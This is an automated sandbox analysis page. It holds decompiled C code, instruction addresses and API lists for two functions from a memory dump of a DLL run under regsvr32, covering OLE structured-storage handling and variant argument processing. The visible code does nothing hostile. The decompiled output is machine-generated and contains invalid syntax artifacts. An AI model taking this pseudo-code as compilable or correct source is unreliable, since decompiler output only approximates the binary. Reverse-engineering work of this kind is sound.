Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 0
API String ID: 1877664794-4108050209
Opcode ID: 24305ff498a0972c1e145090af2fae3b141af275e36e84d63ad32204611efc9d
Instruction ID: 3f5adac3b7182470e947e03afb00c11f75aa85497de44a8568ceb842f97e41e4
Opcode Fuzzy Hash: 24305ff498a0972c1e145090af2fae3b141af275e36e84d63ad32204611efc9d
Instruction Fuzzy Hash: F141A336A093199BDB218F24CC897FA77B4BF06710F1489A4E655E6280D7B0DEC08F90

Uniqueness

Uniqueness Score: -1.00%

Function 6DA50B12 Relevance: 12.3, APIs: 8, Instructions: 297
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E6DA50B12(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t114;
				intOrPtr _t118;
				intOrPtr* _t119;
				void* _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr* _t127;
				void _t129;
				intOrPtr* _t131;
				long _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void _t139;
				void _t141;
				void* _t143;
				void* _t144;
				void* _t147;
				void* _t148;
				void _t149;
				void* _t151;
				intOrPtr* _t153;
				void* _t154;
				void _t158;
				void* _t159;
				void _t161;
				intOrPtr* _t163;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t186;
				intOrPtr* _t206;
				void* _t210;
				intOrPtr* _t219;
				intOrPtr* _t221;
				void* _t222;
				void* _t224;

				_push(0x68);
				_t114 = E6DA5C80D(E6DA6EC9B, __ebx, __edi, __esi);
				_t221 = __ecx;
				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
				_t219 = __ecx + 0x50;
				 *(_t224 - 0x10) = 0;
				if( *_t219 != 0) {
					L2:
					 *(_t224 + 8) = 0;
					 *(_t224 - 0x14) = 0;
					 *((intOrPtr*)(_t224 + 0x14)) = 0;
					E6DA4F17B(_t221, _t221 + 0x40);
					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
					if(_t118 != 0) {
						L5:
						_t222 =  *(_t224 + 0xc);
						if(_t222 == 0) {
							__eflags =  *(_t224 + 0x10);
							if( *(_t224 + 0x10) != 0) {
								L16:
								_t119 =  *_t219;
								_t210 = _t224 - 0x14;
								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x6da79298, _t210);
								__eflags = _t120;
								if(_t120 < 0) {
									L43:
									if( *(_t224 - 0x10) >= 0) {
										L46:
										_t121 =  *((intOrPtr*)(_t224 + 0x14));
										if(_t121 != 0) {
											 *((intOrPtr*)( *_t121 + 8))(_t121);
										}
										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
											 *(_t224 - 0x10) = 1;
										}
										_t122 =  *(_t224 - 0x10);
										L52:
										return E6DA5C8E5(_t122);
									}
									L44:
									_t125 =  *_t219;
									if(_t125 != 0) {
										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
										_t127 =  *_t219;
										 *((intOrPtr*)( *_t127 + 8))(_t127);
										 *_t219 = 0;
									}
									goto L46;
								}
								__eflags = _t222;
								if(_t222 != 0) {
									__eflags =  *(_t224 + 0x10);
									if( *(_t224 + 0x10) == 0) {
										 *(_t224 - 0x10) = 0x8000ffff;
										L37:
										_t129 =  *(_t224 - 0x14);
										L38:
										 *((intOrPtr*)( *_t129 + 8))(_t129);
										L39:
										if( *(_t224 - 0x10) < 0) {
											goto L44;
										}
										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
											_t186 =  *((intOrPtr*)(_t224 - 0x24));
											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
												_t131 =  *_t219;
												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
											}
										}
										goto L43;
									}
									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
									 *(_t224 - 0x2c) = _t134;
									__eflags = _t210;
									if(__eflags > 0) {
										L29:
										 *(_t224 - 0x10) = 0x8007000e;
										 *(_t224 + 0x10) = 0;
										L30:
										 *(_t224 - 0x1c) = 0;
										__eflags =  *(_t224 + 0x10);
										if( *(_t224 + 0x10) == 0) {
											goto L37;
										}
										_t135 = _t224 - 0x1c;
										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
										__eflags = _t135;
										 *(_t224 - 0x10) = _t135;
										if(_t135 < 0) {
											goto L37;
										}
										_t136 = _t224 - 0x18;
										 *(_t224 - 0x18) = 0;
										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
										__eflags = _t136;
										 *(_t224 - 0x10) = _t136;
										if(_t136 >= 0) {
											_t139 =  *(_t224 - 0x14);
											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
											_t141 =  *(_t224 - 0x18);
											 *((intOrPtr*)( *_t141 + 8))(_t141);
										}
										_t137 =  *(_t224 - 0x1c);
										L35:
										 *((intOrPtr*)( *_t137 + 8))(_t137);
										goto L37;
									}
									if(__eflags < 0) {
										L26:
										_t143 = GlobalAlloc(0, _t134);
										 *(_t224 + 0x10) = _t143;
										__eflags = _t143;
										if(_t143 == 0) {
											goto L29;
										}
										_t144 = GlobalLock(_t143);
										__eflags = _t144;
										if(_t144 == 0) {
											goto L29;
										}
										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
										GlobalUnlock( *(_t224 + 0x10));
										goto L30;
									}
									__eflags = _t134 - 0xffffffff;
									if(_t134 >= 0xffffffff) {
										goto L29;
									}
									goto L26;
								}
								_t147 = _t224 + 0xc;
								 *(_t224 + 0xc) = 0;
								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
								__eflags = _t147;
								 *(_t224 - 0x10) = _t147;
								if(_t147 < 0) {
									goto L37;
								}
								_t148 = _t224 + 0x10;
								 *(_t224 + 0x10) = 0;
								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
								__eflags = _t148;
								 *(_t224 - 0x10) = _t148;
								if(_t148 >= 0) {
									_t149 =  *(_t224 - 0x14);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
									_t151 =  *(_t224 + 0x10);
									 *((intOrPtr*)( *_t151 + 8))(_t151);
								}
								_t137 =  *(_t224 + 0xc);
								goto L35;
							}
							L11:
							_t153 =  *_t219;
							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x6da79348, _t224 + 8);
							__eflags = _t154;
							if(_t154 < 0) {
								goto L16;
							} else {
								__eflags = _t222;
								if(__eflags != 0) {
									E6DA4BA8F(0, _t224 - 0x74, _t219, _t222, __eflags);
									 *(_t224 - 4) = 0;
									E6DA4B2CE(_t224 - 0x2c, _t224 - 0x74);
									_t158 =  *(_t224 + 8);
									_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
									_t47 = _t224 - 4;
									 *_t47 =  *(_t224 - 4) | 0xffffffff;
									__eflags =  *_t47;
									 *(_t224 - 0x10) = _t159;
									E6DA4BA51(0, _t224 - 0x74, _t219, _t222,  *_t47);
								} else {
									_t161 =  *(_t224 + 8);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
								}
								_t129 =  *(_t224 + 8);
								goto L38;
							}
						}
						if( *(_t224 + 0x10) != 0) {
							goto L16;
						}
						_t163 =  *_t219;
						_push(_t224 + 0x14);
						_push(0x6da79338);
						_push(_t163);
						if( *((intOrPtr*)( *_t163))() < 0) {
							goto L11;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(3);
						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
							goto L11;
						} else {
							 *(_t224 + 0x10) = 0;
							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
							_t206 =  *((intOrPtr*)(_t224 + 0x14));
							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
							_t170 =  *((intOrPtr*)(_t224 + 0x14));
							 *((intOrPtr*)( *_t170 + 8))(_t170);
							 *((intOrPtr*)(_t224 + 0x14)) = 0;
							goto L39;
						}
					}
					_t172 =  *_t219;
					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
						goto L5;
					}
					_t174 =  *_t219;
					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
					 *(_t224 - 0x10) = _t175;
					if(_t175 < 0) {
						goto L44;
					}
					goto L5;
				}
				_t122 = E6DA4EF74(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x6da791a8, _t219,  *((intOrPtr*)(_t224 + 0x14)));
				 *(_t224 - 0x10) = _t122;
				if(_t122 < 0) {
					goto L52;
				}
				goto L2;
			}

0x6da50b12
0x6da50b19
0x6da50b1e
0x6da50b20
0x6da50b25
0x6da50b28
0x6da50b2d
0x6da50b4e
0x6da50b54
0x6da50b57
0x6da50b5a
0x6da50b5d
0x6da50b66
0x6da50b6c
0x6da50b71
0x6da50ba4
0x6da50ba4
0x6da50ba9
0x6da50c0e
0x6da50c11
0x6da50c7d
0x6da50c7d
0x6da50c81
0x6da50c8b
0x6da50c8d
0x6da50c8f
0x6da50dde
0x6da50de1
0x6da50dfb
0x6da50dfb
0x6da50e00
0x6da50e05
0x6da50e05
0x6da50e0b
0x6da50e12
0x6da50e12
0x6da50e19
0x6da50e1c
0x6da50e21
0x6da50e21
0x6da50de3
0x6da50de3
0x6da50de7
0x6da50dee
0x6da50df1
0x6da50df6
0x6da50df9
0x6da50df9
0x00000000
0x6da50de7
0x6da50c95
0x6da50c97
0x6da50cf1
0x6da50cf4
0x6da50da6
0x6da50dad
0x6da50dad
0x6da50db0
0x6da50db3
0x6da50db6
0x6da50db9
0x00000000
0x00000000
0x6da50dbe
0x6da50dc0
0x6da50dca
0x6da50dcc
0x6da50ddb
0x6da50ddb
0x6da50dca
0x00000000
0x6da50dbe
0x6da50cfe
0x6da50d01
0x6da50d04
0x6da50d06
0x6da50d3f
0x6da50d3f
0x6da50d46
0x6da50d49
0x6da50d49
0x6da50d4c
0x6da50d4f
0x00000000
0x00000000
0x6da50d51
0x6da50d5a
0x6da50d60
0x6da50d62
0x6da50d65
0x00000000
0x00000000
0x6da50d67
0x6da50d73
0x6da50d76
0x6da50d7c
0x6da50d7e
0x6da50d81
0x6da50d83
0x6da50d8f
0x6da50d92
0x6da50d98
0x6da50d98
0x6da50d9b
0x6da50d9e
0x6da50da1
0x00000000
0x6da50da1
0x6da50d08
0x6da50d0f
0x6da50d11
0x6da50d17
0x6da50d1a
0x6da50d1c
0x00000000
0x00000000
0x6da50d1f
0x6da50d25
0x6da50d27
0x00000000
0x00000000
0x6da50d31
0x6da50d37
0x00000000
0x6da50d37
0x6da50d0a
0x6da50d0d
0x00000000
0x00000000
0x00000000
0x6da50d0d
0x6da50c99
0x6da50ca0
0x6da50ca3
0x6da50ca9
0x6da50cab
0x6da50cae
0x00000000
0x00000000
0x6da50cb4
0x6da50cc1
0x6da50cc4
0x6da50cca
0x6da50ccc
0x6da50ccf
0x6da50cd1
0x6da50cdd
0x6da50ce0
0x6da50ce6
0x6da50ce6
0x6da50ce9
0x00000000
0x6da50ce9
0x6da50c13
0x6da50c13
0x6da50c21
0x6da50c23
0x6da50c25
0x00000000
0x6da50c27
0x6da50c27
0x6da50c29
0x6da50c45
0x6da50c51
0x6da50c54
0x6da50c59
0x6da50c63
0x6da50c66
0x6da50c66
0x6da50c66
0x6da50c6d
0x6da50c70
0x6da50c2b
0x6da50c2b
0x6da50c34
0x6da50c34
0x6da50c75
0x00000000
0x6da50c75
0x6da50c25
0x6da50bae
0x00000000
0x00000000
0x6da50bb4
0x6da50bbb
0x6da50bbc
0x6da50bc1
0x6da50bc6
0x00000000
0x00000000
0x6da50bca
0x6da50bcb
0x6da50bcc
0x6da50bcd
0x6da50bd6
0x00000000
0x6da50bd8
0x6da50be7
0x6da50bea
0x6da50bed
0x6da50bfa
0x6da50bfd
0x6da50c03
0x6da50c06
0x00000000
0x6da50c06
0x6da50bd6
0x6da50b73
0x6da50b7e
0x6da50b88
0x00000000
0x00000000
0x6da50b8a
0x6da50b96
0x6da50b9b
0x6da50b9e
0x00000000
0x00000000
0x00000000
0x6da50b9e
0x6da50b3e
0x6da50b45
0x6da50b48
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 6DA50B19

Part of subcall function 6DA4EF74: SysStringLen.OLEAUT32(?), ref: 6DA4EF7E
Part of subcall function 6DA4EF74: CoGetClassObject.OLE32(?,?,00000000,6DA79268,?), ref: 6DA4EF9C

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 6DA50CA3
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 6DA50CC4
GlobalAlloc.KERNEL32(00000000,00000000), ref: 6DA50D11
GlobalLock.KERNEL32 ref: 6DA50D1F
GlobalUnlock.KERNEL32(?), ref: 6DA50D37
CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 6DA50D5A
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 6DA50D76

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
String ID:
API String ID: 317715441-0
Opcode ID: d95060477d7ad47a6b313d7ffa5f184f252157441e545bc403f08e874244d4e7
Instruction ID: 4c9497246a41d80dc7a470096236bfb925412004bbe1a5cd7c25e8c025462c56
Opcode Fuzzy Hash: d95060477d7ad47a6b313d7ffa5f184f252157441e545bc403f08e874244d4e7
Instruction Fuzzy Hash: 97C13CB590420ADFDF00DFA5C9889AEBBB9FF49308B10492DF915EB250C771A991CB64

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5748C Relevance: 12.3, APIs: 8, Instructions: 256
stringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E6DA5748C(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t121;
				int _t122;
				CHAR* _t127;
				CHAR* _t135;
				CHAR* _t140;
				signed int _t141;
				CHAR* _t144;
				CHAR* _t148;
				CHAR* _t151;
				signed short _t154;
				signed int _t156;
				signed int _t160;
				signed int _t161;
				signed int _t172;
				CHAR* _t176;
				void* _t179;
				void* _t182;
				intOrPtr _t185;
				CHAR* _t188;
				CHAR* _t189;
				int _t191;
				char* _t194;
				void* _t195;
				void* _t196;
				CHAR* _t197;
				char* _t199;
				void* _t200;
				long long _t205;

				_t200 = __eflags;
				_t185 = __edx;
				_push(0x50);
				E6DA5C8AC(E6DA6F033, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t196 - 0x34)) = __ecx;
				E6DA4989A(_t196 - 0x2c, _t200,  *((intOrPtr*)(__ecx + 0x1c)));
				_t176 =  *(_t196 + 8);
				_t121 = _t176[8];
				_t187 = 0;
				 *(_t196 - 4) = 0;
				 *(_t196 - 0x19) = 0;
				 *(_t196 - 0x18) = _t121;
				if(_t121 == 0) {
					 *(_t196 - 0x18) = _t196 - 0x19;
				}
				_t122 = lstrlenA( *(_t196 - 0x18));
				_t202 =  *(_t196 + 0xc) & 0x0000000c;
				_t191 = _t122;
				 *(_t196 - 0x20) = _t176[0x10];
				 *(_t196 - 0x24) = _t176[0xc] & 0x0000ffff;
				if(( *(_t196 + 0xc) & 0x0000000c) == 0) {
					L11:
					_t192 =  *(_t196 + 0x14);
					_push( *(_t192 + 8) << 4);
					_t127 = E6DA4437A(_t176, _t185, _t187, _t192, __eflags);
					_pop(_t179);
					__eflags = _t127;
					if(_t127 != 0) {
						_t192 =  *(_t192 + 8);
						__eflags = _t192 - 0x7ffffff;
						if(_t192 > 0x7ffffff) {
							goto L12;
						}
						E6DA5CED0(_t192 << 4);
						 *(_t196 - 0x10) = _t197;
						 *(_t196 - 0x30) = _t197;
						E6DA5C5A0(_t187,  *(_t196 - 0x30), _t187, _t192 << 4);
						_t199 =  &(_t197[0xc]);
						_t187 = E6DA56C3A(_t179,  *(_t196 - 0x18),  *(_t196 - 0x24));
						_t49 =  &(_t187[8]); // 0x10
						_t192 = _t49;
						_push(_t49);
						_t135 = E6DA4437A(_t176, _t185, _t187, _t49, __eflags);
						__eflags = _t135;
						if(_t135 == 0) {
							L4:
							 *(_t196 - 4) =  *(_t196 - 4) | 0xffffffff;
							if( *(_t196 - 0x28) == 0) {
								L7:
								L55:
								return E6DA5C908(_t176, _t187, _t192);
							}
							_push( *((intOrPtr*)(_t196 - 0x2c)));
							_push(0);
							L6:
							E6DA490A7();
							goto L7;
						}
						E6DA5CED0(_t192);
						 *(_t196 - 0x10) = _t199;
						_t176 = 0;
						_t194 = _t199;
						 *((intOrPtr*)(_t196 - 0x58)) = 0x6da745a8;
						 *((intOrPtr*)(_t196 - 0x54)) = 0;
						 *((intOrPtr*)(_t196 - 0x48)) = 0;
						 *((intOrPtr*)(_t196 - 0x4c)) = 0;
						 *((intOrPtr*)(_t196 - 0x50)) = 0;
						_push(_t196 - 0x58);
						_push( *(_t196 - 0x30));
						_push( *((intOrPtr*)(_t196 + 0x18)));
						 *(_t196 - 4) = 1;
						_push( *(_t196 + 0x14));
						_push( *(_t196 - 0x24));
						_push(_t196 - 0x44);
						_push( *(_t196 - 0x18));
						_push(_t194);
						_t140 = E6DA571A8(0,  *((intOrPtr*)(_t196 - 0x34)), _t187, _t194, __eflags);
						 *(_t196 - 0x18) = _t140;
						__eflags = _t140;
						if(_t140 != 0) {
							L26:
							_t141 =  *(_t196 + 0x14);
							_t192 = 0;
							__eflags =  *(_t141 + 8);
							if( *(_t141 + 8) <= 0) {
								L29:
								__eflags =  *(_t196 - 0x18);
								_t182 = _t196 - 0x58;
								if( *(_t196 - 0x18) == 0) {
									E6DA570E8(_t176, _t182, _t187);
									_t187 =  *(_t196 + 0x10);
									__eflags = _t187;
									if(_t187 == 0) {
										_t144 = ( *(_t196 - 0x24) & 0x0000ffff) - 8;
										__eflags = _t144;
										if(_t144 == 0) {
											__imp__#6(_t176);
											L52:
											 *(_t196 - 4) = 0;
											E6DA57008(_t196 - 0x58);
											 *(_t196 - 4) =  *(_t196 - 4) | 0xffffffff;
											__eflags =  *(_t196 - 0x28);
											if( *(_t196 - 0x28) != 0) {
												_push( *((intOrPtr*)(_t196 - 0x2c)));
												_push(0);
												E6DA490A7();
											}
											__eflags = 0;
											goto L55;
										}
										_t148 = _t144 - 1;
										__eflags = _t148;
										if(_t148 == 0) {
											L48:
											__eflags = _t176;
											if(_t176 != 0) {
												 *((intOrPtr*)( *_t176 + 8))(_t176);
											}
											goto L52;
										}
										_t151 = _t148 - 3;
										__eflags = _t151;
										if(_t151 == 0) {
											__imp__#9(_t196 - 0x44);
											goto L52;
										}
										__eflags = _t151 != 1;
										if(_t151 != 1) {
											goto L52;
										}
										goto L48;
									}
									_t154 =  *(_t196 - 0x24);
									 *_t187 = _t154;
									_t156 = (_t154 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t156 - 0x13;
									if(_t156 > 0x13) {
										goto L52;
									}
									switch( *((intOrPtr*)(_t156 * 4 +  &M6DA577A4))) {
										case 0:
											 *((short*)(__edi + 8)) = __bx;
											goto L52;
										case 1:
											 *((intOrPtr*)(__edi + 8)) = __ebx;
											goto L52;
										case 2:
											 *((intOrPtr*)(__edi + 8)) =  *((intOrPtr*)(__ebp - 0x44));
											goto L52;
										case 3:
											 *((long long*)(__edi + 8)) =  *((long long*)(__ebp - 0x44));
											goto L52;
										case 4:
											__eax =  *((intOrPtr*)(__ebp - 0x44));
											 *((intOrPtr*)(__edi + 8)) =  *((intOrPtr*)(__ebp - 0x44));
											__eax =  *((intOrPtr*)(__ebp - 0x40));
											 *((intOrPtr*)(__edi + 0xc)) =  *((intOrPtr*)(__ebp - 0x40));
											goto L52;
										case 5:
											__eax = 0;
											__eflags = __bx;
											0 | __eflags == 0x00000000 = (0 | __eflags == 0x00000000) - 1;
											 *((short*)(__edi + 8)) = __ax;
											goto L52;
										case 6:
											__esi = __ebp - 0x44;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L52;
										case 7:
											goto L52;
										case 8:
											_t187[4] = _t176;
											goto L52;
									}
								}
								 *(_t196 - 4) = 0;
								E6DA57008(_t182);
								 *(_t196 - 4) =  *(_t196 - 4) | 0xffffffff;
								__eflags =  *(_t196 - 0x28);
								if( *(_t196 - 0x28) != 0) {
									_push( *((intOrPtr*)(_t196 - 0x2c)));
									_push(0);
									E6DA490A7();
								}
								goto L55;
							}
							_t188 =  *(_t196 - 0x30);
							do {
								__imp__#9(_t188);
								_t160 =  *(_t196 + 0x14);
								_t192 = _t192 + 1;
								_t188 =  &(_t188[0x10]);
								__eflags = _t192 -  *((intOrPtr*)(_t160 + 8));
							} while (_t192 <  *((intOrPtr*)(_t160 + 8)));
							goto L29;
						}
						_t161 =  *(_t196 - 0x24) & 0x0000ffff;
						_push(_t187);
						_push(_t194);
						_push( *(_t196 - 0x20));
						 *(_t196 - 4) = 2;
						__eflags = _t161 - 4;
						if(_t161 == 4) {
							E6DA5917E();
							 *((intOrPtr*)(_t196 - 0x34)) = _t205;
							 *((intOrPtr*)(_t196 - 0x44)) =  *((intOrPtr*)(_t196 - 0x34));
							L25:
							 *(_t196 - 4) = 1;
							goto L26;
						}
						__eflags = _t161 - 5;
						if(_t161 == 5) {
							L23:
							E6DA5917E();
							 *((long long*)(_t196 - 0x44)) = _t205;
							goto L25;
						}
						__eflags = _t161 - 7;
						if(_t161 == 7) {
							goto L23;
						}
						__eflags = _t161 + 0xffffffec - 1;
						if(_t161 + 0xffffffec > 1) {
							_t176 = E6DA5917E();
						} else {
							 *((intOrPtr*)(_t196 - 0x44)) = E6DA5917E();
							 *((intOrPtr*)(_t196 - 0x40)) = _t185;
						}
						goto L25;
					}
					L12:
					 *(_t196 - 4) =  *(_t196 - 4) | 0xffffffff;
					__eflags =  *(_t196 - 0x28) - _t187;
					if( *(_t196 - 0x28) == _t187) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t196 - 0x2c)));
					_push(_t187);
					goto L6;
				}
				_t19 = _t191 + 3; // 0x3
				_t187 = _t19;
				_push(_t19);
				if(E6DA4437A(_t176, _t185, _t19, _t191, _t202) != 0) {
					E6DA5CED0(_t187);
					 *(_t196 - 0x10) = _t197;
					_t189 = _t197;
					_t26 = _t191 + 3; // 0x3
					E6DA441DD(_t176, _t189, _t26,  *(_t196 - 0x18), _t191);
					_t172 = _t176[0xc] & 0x0000ffff;
					_t197 =  &(_t197[0x10]);
					 *(_t196 - 0x18) = _t189;
					__eflags = _t172 - 8;
					if(_t172 == 8) {
						_t172 = 0xe;
					}
					 *(_t196 - 0x24) =  *(_t196 - 0x24) & 0x00000000;
					_t189[_t191] = 0xff;
					_t195 = _t191 + 1;
					_t189[_t195] = _t172;
					_t189[_t195 + 1] = 0;
					 *(_t196 - 0x20) = _t176[0x14];
					_t187 = 0;
					__eflags = 0;
					goto L11;
				}
				goto L4;
			}

0x6da5748c
0x6da5748c
0x6da5748c
0x6da57493
0x6da57498
0x6da574a1
0x6da574a6
0x6da574a9
0x6da574ac
0x6da574ae
0x6da574b1
0x6da574b5
0x6da574ba
0x6da574bf
0x6da574bf
0x6da574c5
0x6da574cb
0x6da574cf
0x6da574d4
0x6da574db
0x6da574de
0x6da57552
0x6da57552
0x6da5755b
0x6da5755c
0x6da57561
0x6da57562
0x6da57564
0x6da57575
0x6da57578
0x6da5757e
0x00000000
0x00000000
0x6da57585
0x6da5758a
0x6da5758d
0x6da57595
0x6da5759a
0x6da575a8
0x6da575aa
0x6da575aa
0x6da575ad
0x6da575ae
0x6da575b4
0x6da575b6
0x6da574ee
0x6da574ee
0x6da574f6
0x6da57502
0x6da57798
0x6da577a0
0x6da577a0
0x6da574f8
0x6da574fb
0x6da574fd
0x6da574fd
0x00000000
0x6da574fd
0x6da575be
0x6da575c3
0x6da575c6
0x6da575c8
0x6da575ca
0x6da575d1
0x6da575d4
0x6da575d7
0x6da575da
0x6da575e3
0x6da575e4
0x6da575ea
0x6da575ed
0x6da575f1
0x6da575f4
0x6da575f7
0x6da575f8
0x6da575fb
0x6da575fc
0x6da57601
0x6da57604
0x6da57606
0x6da57661
0x6da57661
0x6da57664
0x6da57666
0x6da57669
0x6da57681
0x6da57681
0x6da57685
0x6da57688
0x6da576d5
0x6da576da
0x6da576dd
0x6da576df
0x6da57747
0x6da57747
0x6da5774a
0x6da57770
0x6da57776
0x6da57779
0x6da5777d
0x6da57782
0x6da57786
0x6da5778a
0x6da5778c
0x6da5778f
0x6da57791
0x6da57791
0x6da57796
0x00000000
0x6da57796
0x6da5774c
0x6da5774c
0x6da5774d
0x6da57757
0x6da57757
0x6da57759
0x6da5775e
0x6da5775e
0x00000000
0x6da57759
0x6da5774f
0x6da5774f
0x6da57752
0x6da57767
0x00000000
0x6da57767
0x6da57754
0x6da57755
0x00000000
0x00000000
0x00000000
0x6da57755
0x6da576e1
0x6da576e4
0x6da576ea
0x6da576ed
0x6da576f0
0x00000000
0x00000000
0x6da576f6
0x00000000
0x6da57702
0x00000000
0x00000000
0x6da5773e
0x00000000
0x00000000
0x6da57719
0x00000000
0x00000000
0x6da57721
0x00000000
0x00000000
0x6da57708
0x6da5770b
0x6da5770e
0x6da57711
0x00000000
0x00000000
0x6da57726
0x6da57728
0x6da5772e
0x6da5772f
0x00000000
0x00000000
0x6da57735
0x6da57738
0x6da57739
0x6da5773a
0x6da5773b
0x00000000
0x00000000
0x00000000
0x00000000
0x6da576fd
0x00000000
0x00000000
0x6da576f6
0x6da5768a
0x6da5768e
0x6da57693
0x6da57697
0x6da5769b
0x6da5769d
0x6da576a0
0x6da576a2
0x6da576a2
0x00000000
0x6da576a7
0x6da5766b
0x6da5766e
0x6da5766f
0x6da57675
0x6da57678
0x6da57679
0x6da5767c
0x6da5767c
0x00000000
0x6da5766e
0x6da57608
0x6da5760c
0x6da5760d
0x6da5760e
0x6da57611
0x6da57615
0x6da57618
0x6da5764c
0x6da57651
0x6da57657
0x6da5765a
0x6da5765a
0x00000000
0x6da5765a
0x6da5761a
0x6da5761d
0x6da57642
0x6da57642
0x6da57647
0x00000000
0x6da57647
0x6da5761f
0x6da57622
0x00000000
0x00000000
0x6da57627
0x6da5762a
0x6da5763e
0x6da5762c
0x6da57631
0x6da57634
0x6da57634
0x00000000
0x6da5762a
0x6da57566
0x6da57566
0x6da5756a
0x6da5756d
0x00000000
0x00000000
0x6da5756f
0x6da57572
0x00000000
0x6da57572
0x6da574e0
0x6da574e0
0x6da574e3
0x6da574ec
0x6da5750e
0x6da57513
0x6da57516
0x6da5751c
0x6da57521
0x6da57526
0x6da5752a
0x6da5752d
0x6da57530
0x6da57534
0x6da57538
0x6da57538
0x6da57539
0x6da5753d
0x6da57541
0x6da57542
0x6da57545
0x6da5754d
0x6da57550
0x6da57550
0x00000000
0x6da57550
0x00000000

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6DA57493
lstrlenA.KERNEL32(00000000,000000FF,00000050,6DA4D78D,00000000,00000001,?,?,000000FF,?,?,?,?,?,?,00000034), ref: 6DA574C5
__alloca_probe_16.LIBCMT ref: 6DA5750E

Part of subcall function 6DA441DD: _memcpy_s.LIBCMT ref: 6DA441EE

__alloca_probe_16.LIBCMT ref: 6DA57585
__alloca_probe_16.LIBCMT ref: 6DA575BE
VariantClear.OLEAUT32(?), ref: 6DA5766F

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
